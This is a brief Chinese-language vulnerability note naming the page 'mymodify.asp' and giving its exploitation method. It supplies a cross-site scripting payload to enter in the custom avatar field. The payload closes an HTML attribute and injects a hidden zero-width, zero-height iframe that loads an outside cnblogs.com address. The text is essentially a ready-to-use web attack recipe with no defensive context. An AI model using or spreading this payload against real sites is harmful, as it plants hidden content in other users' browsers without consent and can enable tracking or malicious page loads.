漏洞页面:mymodify.asp利用方法:在自定义头像中输入跨站代码:"/>空格<iframe src=http://allyesno.cnblogs.com width=0 height=0></iframe>